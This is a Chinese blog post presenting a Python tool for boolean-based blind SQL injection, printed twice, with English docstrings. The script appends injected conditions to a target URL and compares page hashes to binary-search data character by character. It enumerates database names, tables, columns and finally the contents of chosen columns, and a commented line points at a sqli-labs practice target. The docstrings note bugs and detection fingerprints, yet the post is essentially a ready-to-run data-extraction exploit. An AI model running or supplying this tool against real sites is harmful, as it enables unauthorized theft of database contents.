sql注入半自动化扫描工具——盲注(分析后续补上)
2018-06-11 18:31
代码展示墙:
import requests
import sys
import hashlib
from optparse import OptionParser
# Command-line switches. Every option is stored as a plain string and
# nothing is validated here, so a missing value reaches the query
# builders below as None and fails there (TypeError on concatenation).
parser = OptionParser()
parser.add_option("-D", "--Database", action="store", type="string", dest="database", help="Please input test databases")
parser.add_option("-T", "--Table", action="store", type="string", dest="table", help="Please input test table")
parser.add_option("-C", "--Column", action="store", type="string", dest="column", help="Please input test column")
parser.add_option("-U", "--Url", action="store", type="string", dest="url", help="Please input test url")
# Module-level side effect: sys.argv is parsed at import time, not under
# a __main__ guard, so importing this file from elsewhere also parses it.
(options, args) = parser.parse_args()


def md5(str):
    """Return the hex MD5 digest of *str*.

    Used purely as a cheap fingerprint to tell two HTTP response bodies
    apart, so the weakness of MD5 is irrelevant here. The parameter name
    shadows the builtin ``str`` inside this function. On Python 3
    ``hl.update`` requires bytes; ``http_get`` hands over
    ``response.content`` (bytes), so the pairing works, but passing a
    text string would raise TypeError.
    """
    hl = hashlib.md5()
    hl.update(str)
    return hl.hexdigest()


def http_get(url):
    """Perform one GET on *url* and return the raw body (bytes).

    No timeout, no status-code check and no exception handling: a hung,
    refused or blocked connection propagates straight out of the
    caller's loops. Each call is one request to the target; the
    enumeration functions below issue many of them per character, which
    is what makes this activity stand out in access and WAF logs.
    """
    a = requests.get(url)
    return a.content


def getAllDatabases(url):
    """Recover schema names through the boolean oracle in ``main`` and print them.

    Three kinds of sub-query go through ``main``: the schema count, then
    per schema the length of its name, then one ``ascii(substr(...))``
    probe per character. ``main`` binary-searches 0..126 with up to two
    requests per step, so each recovered character costs roughly 7-14
    near-identical requests, all carrying ``information_schema.schemata``
    in the query string — a concrete pattern for detection rules.

    ``db_numbers`` is whatever ``main`` returns; if ``main`` finishes its
    loop without a match it returns None and ``range(None)`` raises
    TypeError here. Output is printed with a Chinese label
    ("name of database #i is ...").
    """
    db_nums_payload = "select count(schema_name) from information_schema.schemata"
    db_numbers = main(url, db_nums_payload)
    db_name = ""
    for i in range(db_numbers):
        # length of the i-th schema name (limit i,1 selects that row)
        db_len_payload = "select length(schema_name) from information_schema.schemata limit %d,1" % i
        db_name_numbers = main(url, db_len_payload)
        for x in range(1, db_name_numbers + 1):
            # x-th character of the i-th name, resolved as its ASCII code
            db_lenc_payload = "select ascii(substr((select schema_name from information_schema.schemata limit %d,1),%d,1))" % (i, x)
            db_name += chr(main(url, db_lenc_payload))
        print("第%d个数据库的名称为:%s" % (i + 1, db_name))
        db_name = ""
def main(url, payload):
    """Binary-search the integer value of the SQL sub-query *payload*.

    Boolean oracle: the unmodified *url* is fetched once and fingerprinted
    (``a``). Each probe appends ``' and (<payload>) > <mid> --+`` to the
    URL and compares the response fingerprint with ``a``. An identical
    page means the comparison held, i.e. the value is greater than
    ``mid``; a different page means the value is at most ``mid``, and a
    second request with ``mid-1`` decides whether ``mid`` is the exact
    value.

    Returns the value as an int, or None when the loop ends without a
    match — for example when the page fingerprint changes for unrelated
    reasons (dynamic content, rate limiting, a block page). Every caller
    passes the result to ``range`` or ``chr``, so None turns into a
    TypeError there rather than here.

    ``(low+high)/2`` is integer division on Python 2 only; under Python 3
    ``mid`` becomes a float, which ``%d`` truncates and ``int()`` wraps,
    so it still runs, but the script reads as Python 2 code.
    """
    low = 0
    high = 126
    # Baseline fingerprint of the untouched page; every comparison is relative to it.
    a = md5(http_get(url))
    while low <= high:
        mid = (low + high) / 2
        # select count(schema_name) from information_schema.schemata;
        cc = url + "' and (%s) > %d --+" % (payload, mid)
        b = md5(http_get(cc))
        if a == b:
            # same page: (payload) > mid held, continue in the upper half
            low = mid + 1
        else:
            # page changed: (payload) <= mid; check mid-1 to see whether mid is exact
            q = mid - 1
            c = md5(http_get(url + "' and (%s) > %d --+" % (payload, q)))
            if c == a:
                return int(mid)
                break  # unreachable: the return above already left the function
            else:
                high = mid - 1
#getAllDatabases('http://192.168.3.104/sqli-labs/Less-8/?id=1')


def select():
    """Dispatch on which CLI switches were supplied.

    Handled combinations: none (print help and exit), url only,
    url+database, url+database+table, url+database+table+column. Any
    other mix (e.g. -D without -U, or -C without -T) matches no branch
    and the function returns silently without output.

    Note the argument order is not uniform across the callees:
    ``getAllColumnsByTable(url, table, database)`` and
    ``getAllContent(url, column, table, database)``.
    """
    if options.url == None and options.database == None and options.table == None and options.column == None:
        print("Please read the help")
        parser.print_help()
        sys.exit()
    elif options.url != None and options.database == None and options.table == None and options.column == None:
        getAllDatabases(options.url)
    elif options.url != None and options.database != None and options.table == None and options.column == None:
        getAllTables(options.url, options.database)
    elif options.url != None and options.database != None and options.table != None and options.column == None:
        getAllColumnsByTable(options.url, options.table, options.database)
    elif options.url != None and options.database != None and options.table != None and options.column != None:
        getAllContent(options.url, options.column, options.table, options.database)
def getAllTables(url, database):
    """Recover table names of *database* through ``main`` and print them.

    Same count / length / per-character scheme as ``getAllDatabases``,
    keyed on ``information_schema.tables``. *database* is spliced into
    the SQL text verbatim. Every request carries ``information_schema.tables``
    plus the ``' and (`` ... ``--+`` wrapper added by ``main``; the
    request volume per recovered character is the same as described on
    ``getAllDatabases``.
    """
    tb_nums_payload = "select count(table_name) from information_schema.tables where table_schema='" + database + "'"
    tb_numbers = main(url, tb_nums_payload)
    tb_name = ""
    for i in range(tb_numbers):
        tb_len_payload = "select length(table_name) from information_schema.tables limit %d,1" % i
        tb_name_numbers = main(url, tb_len_payload)
        for x in range(1, tb_name_numbers + 1):
            tb_lenc_payload = "select ascii(substr((select table_name from information_schema.tables where table_schema='%s' limit %d,1),%d,1))" % (database, i, x)
            tb_name += chr(main(url, tb_lenc_payload))
        print("第%d个表的名称为:%s" % (i + 1, tb_name))
        tb_name = ""


def getAllColumnsByTable(url, table, database):
    """Recover column names of *table* through ``main`` and print them.

    Keyed on ``information_schema.columns`` by ``table_name`` only; the
    *database* parameter is accepted but not referenced anywhere in this
    function. *table* is spliced into the SQL text verbatim.
    """
    cl_nums_payload = "select count(column_name) from information_schema.columns where table_name='" + table + "'"
    cl_numbers = main(url, cl_nums_payload)
    cl_name = ""
    for i in range(cl_numbers):
        cl_len_payload = "select length(column_name) from information_schema.columns where table_name='%s' limit %d,1" % (table, i)
        cl_name_numbers = main(url, cl_len_payload)
        for x in range(1, cl_name_numbers + 1):
            cl_lenc_payload = "select ascii(substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))" % (table, i, x)
            cl_name += chr(main(url, cl_lenc_payload))
        print("第%d个列的名称为:%s" % (i + 1, cl_name))
        cl_name = ""


def getAllContent(url, column, table, database):
    """Recover the values of *column* in ``database.table`` through ``main`` and print them.

    Same count / length / per-character scheme as the functions above,
    applied to user data rather than to ``information_schema``. All three
    identifiers are spliced into the SQL text verbatim. Because every
    character of every row is resolved with 7-14 requests, dumping even a
    small table produces a long burst of requests that differ only in
    the ``> <n>`` comparison — the per-row ``limit i,1`` and the
    incrementing ``substr`` offset are the fingerprint a detection rule
    can key on.
    """
    ct_nums_payload = "select count(%s) from %s.%s" % (column, database, table)
    ct_numbers = main(url, ct_nums_payload)
    ct_name = ""
    for i in range(ct_numbers):
        ct_len_payload = "select length(%s) from %s.%s limit %d,1" % (column, database, table, i)
        ct_name_numbers = main(url, ct_len_payload)
        for x in range(1, ct_name_numbers + 1):
            ct_lenc_payload = "select ascii(substr((select %s from %s.%s limit %d,1),%d,1))" % (column, database, table, i, x)
            ct_name += chr(main(url, ct_lenc_payload))
        print("第%d个字段的内容为:%s" % (i + 1, ct_name))
        ct_name = ""
# Entry point. Runs unconditionally at import time (no __main__ guard);
# together with the module-level parse_args() above, importing this file
# starts the scan.
select()
先将代码保存在这里,解析以后会补上
# -*- coding: utf-8 -*-import requests
import sys
import hashlib
from optparse import OptionParser
# Command-line switches. Every option is stored as a plain string and
# nothing is validated here, so a missing value reaches the query
# builders below as None and fails there (TypeError on concatenation).
parser = OptionParser()
parser.add_option("-D", "--Database", action="store", type="string", dest="database", help="Please input test databases")
parser.add_option("-T", "--Table", action="store", type="string", dest="table", help="Please input test table")
parser.add_option("-C", "--Column", action="store", type="string", dest="column", help="Please input test column")
parser.add_option("-U", "--Url", action="store", type="string", dest="url", help="Please input test url")
# Module-level side effect: sys.argv is parsed at import time, not under
# a __main__ guard, so importing this file from elsewhere also parses it.
(options, args) = parser.parse_args()


def md5(str):
    """Return the hex MD5 digest of *str*.

    Used purely as a cheap fingerprint to tell two HTTP response bodies
    apart, so the weakness of MD5 is irrelevant here. The parameter name
    shadows the builtin ``str`` inside this function. On Python 3
    ``hl.update`` requires bytes; ``http_get`` hands over
    ``response.content`` (bytes), so the pairing works, but passing a
    text string would raise TypeError.
    """
    hl = hashlib.md5()
    hl.update(str)
    return hl.hexdigest()


def http_get(url):
    """Perform one GET on *url* and return the raw body (bytes).

    No timeout, no status-code check and no exception handling: a hung,
    refused or blocked connection propagates straight out of the
    caller's loops. Each call is one request to the target; the
    enumeration functions below issue many of them per character, which
    is what makes this activity stand out in access and WAF logs.
    """
    a = requests.get(url)
    return a.content


def getAllDatabases(url):
    """Recover schema names through the boolean oracle in ``main`` and print them.

    Three kinds of sub-query go through ``main``: the schema count, then
    per schema the length of its name, then one ``ascii(substr(...))``
    probe per character. ``main`` binary-searches 0..126 with up to two
    requests per step, so each recovered character costs roughly 7-14
    near-identical requests, all carrying ``information_schema.schemata``
    in the query string — a concrete pattern for detection rules.

    ``db_numbers`` is whatever ``main`` returns; if ``main`` finishes its
    loop without a match it returns None and ``range(None)`` raises
    TypeError here. Output is printed with a Chinese label
    ("name of database #i is ...").
    """
    db_nums_payload = "select count(schema_name) from information_schema.schemata"
    db_numbers = main(url, db_nums_payload)
    db_name = ""
    for i in range(db_numbers):
        # length of the i-th schema name (limit i,1 selects that row)
        db_len_payload = "select length(schema_name) from information_schema.schemata limit %d,1" % i
        db_name_numbers = main(url, db_len_payload)
        for x in range(1, db_name_numbers + 1):
            # x-th character of the i-th name, resolved as its ASCII code
            db_lenc_payload = "select ascii(substr((select schema_name from information_schema.schemata limit %d,1),%d,1))" % (i, x)
            db_name += chr(main(url, db_lenc_payload))
        print("第%d个数据库的名称为:%s" % (i + 1, db_name))
        db_name = ""
def main(url, payload):
    """Binary-search the integer value of the SQL sub-query *payload*.

    Boolean oracle: the unmodified *url* is fetched once and fingerprinted
    (``a``). Each probe appends ``' and (<payload>) > <mid> --+`` to the
    URL and compares the response fingerprint with ``a``. An identical
    page means the comparison held, i.e. the value is greater than
    ``mid``; a different page means the value is at most ``mid``, and a
    second request with ``mid-1`` decides whether ``mid`` is the exact
    value.

    Returns the value as an int, or None when the loop ends without a
    match — for example when the page fingerprint changes for unrelated
    reasons (dynamic content, rate limiting, a block page). Every caller
    passes the result to ``range`` or ``chr``, so None turns into a
    TypeError there rather than here.

    ``(low+high)/2`` is integer division on Python 2 only; under Python 3
    ``mid`` becomes a float, which ``%d`` truncates and ``int()`` wraps,
    so it still runs, but the script reads as Python 2 code.
    """
    low = 0
    high = 126
    # Baseline fingerprint of the untouched page; every comparison is relative to it.
    a = md5(http_get(url))
    while low <= high:
        mid = (low + high) / 2
        # select count(schema_name) from information_schema.schemata;
        cc = url + "' and (%s) > %d --+" % (payload, mid)
        b = md5(http_get(cc))
        if a == b:
            # same page: (payload) > mid held, continue in the upper half
            low = mid + 1
        else:
            # page changed: (payload) <= mid; check mid-1 to see whether mid is exact
            q = mid - 1
            c = md5(http_get(url + "' and (%s) > %d --+" % (payload, q)))
            if c == a:
                return int(mid)
                break  # unreachable: the return above already left the function
            else:
                high = mid - 1
#getAllDatabases('http://192.168.3.104/sqli-labs/Less-8/?id=1')


def select():
    """Dispatch on which CLI switches were supplied.

    Handled combinations: none (print help and exit), url only,
    url+database, url+database+table, url+database+table+column. Any
    other mix (e.g. -D without -U, or -C without -T) matches no branch
    and the function returns silently without output.

    Note the argument order is not uniform across the callees:
    ``getAllColumnsByTable(url, table, database)`` and
    ``getAllContent(url, column, table, database)``.
    """
    if options.url == None and options.database == None and options.table == None and options.column == None:
        print("Please read the help")
        parser.print_help()
        sys.exit()
    elif options.url != None and options.database == None and options.table == None and options.column == None:
        getAllDatabases(options.url)
    elif options.url != None and options.database != None and options.table == None and options.column == None:
        getAllTables(options.url, options.database)
    elif options.url != None and options.database != None and options.table != None and options.column == None:
        getAllColumnsByTable(options.url, options.table, options.database)
    elif options.url != None and options.database != None and options.table != None and options.column != None:
        getAllContent(options.url, options.column, options.table, options.database)
def getAllTables(url, database):
    """Recover table names of *database* through ``main`` and print them.

    Same count / length / per-character scheme as ``getAllDatabases``,
    keyed on ``information_schema.tables``. *database* is spliced into
    the SQL text verbatim. Every request carries ``information_schema.tables``
    plus the ``' and (`` ... ``--+`` wrapper added by ``main``; the
    request volume per recovered character is the same as described on
    ``getAllDatabases``.
    """
    tb_nums_payload = "select count(table_name) from information_schema.tables where table_schema='" + database + "'"
    tb_numbers = main(url, tb_nums_payload)
    tb_name = ""
    for i in range(tb_numbers):
        tb_len_payload = "select length(table_name) from information_schema.tables limit %d,1" % i
        tb_name_numbers = main(url, tb_len_payload)
        for x in range(1, tb_name_numbers + 1):
            tb_lenc_payload = "select ascii(substr((select table_name from information_schema.tables where table_schema='%s' limit %d,1),%d,1))" % (database, i, x)
            tb_name += chr(main(url, tb_lenc_payload))
        print("第%d个表的名称为:%s" % (i + 1, tb_name))
        tb_name = ""


def getAllColumnsByTable(url, table, database):
    """Recover column names of *table* through ``main`` and print them.

    Keyed on ``information_schema.columns`` by ``table_name`` only; the
    *database* parameter is accepted but not referenced anywhere in this
    function. *table* is spliced into the SQL text verbatim.
    """
    cl_nums_payload = "select count(column_name) from information_schema.columns where table_name='" + table + "'"
    cl_numbers = main(url, cl_nums_payload)
    cl_name = ""
    for i in range(cl_numbers):
        cl_len_payload = "select length(column_name) from information_schema.columns where table_name='%s' limit %d,1" % (table, i)
        cl_name_numbers = main(url, cl_len_payload)
        for x in range(1, cl_name_numbers + 1):
            cl_lenc_payload = "select ascii(substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))" % (table, i, x)
            cl_name += chr(main(url, cl_lenc_payload))
        print("第%d个列的名称为:%s" % (i + 1, cl_name))
        cl_name = ""


def getAllContent(url, column, table, database):
    """Recover the values of *column* in ``database.table`` through ``main`` and print them.

    Same count / length / per-character scheme as the functions above,
    applied to user data rather than to ``information_schema``. All three
    identifiers are spliced into the SQL text verbatim. Because every
    character of every row is resolved with 7-14 requests, dumping even a
    small table produces a long burst of requests that differ only in
    the ``> <n>`` comparison — the per-row ``limit i,1`` and the
    incrementing ``substr`` offset are the fingerprint a detection rule
    can key on.
    """
    ct_nums_payload = "select count(%s) from %s.%s" % (column, database, table)
    ct_numbers = main(url, ct_nums_payload)
    ct_name = ""
    for i in range(ct_numbers):
        ct_len_payload = "select length(%s) from %s.%s limit %d,1" % (column, database, table, i)
        ct_name_numbers = main(url, ct_len_payload)
        for x in range(1, ct_name_numbers + 1):
            ct_lenc_payload = "select ascii(substr((select %s from %s.%s limit %d,1),%d,1))" % (column, database, table, i, x)
            ct_name += chr(main(url, ct_lenc_payload))
        print("第%d个字段的内容为:%s" % (i + 1, ct_name))
        ct_name = ""
# Entry point. Runs unconditionally at import time (no __main__ guard);
# together with the module-level parse_args() above, importing this file
# starts the scan.
select()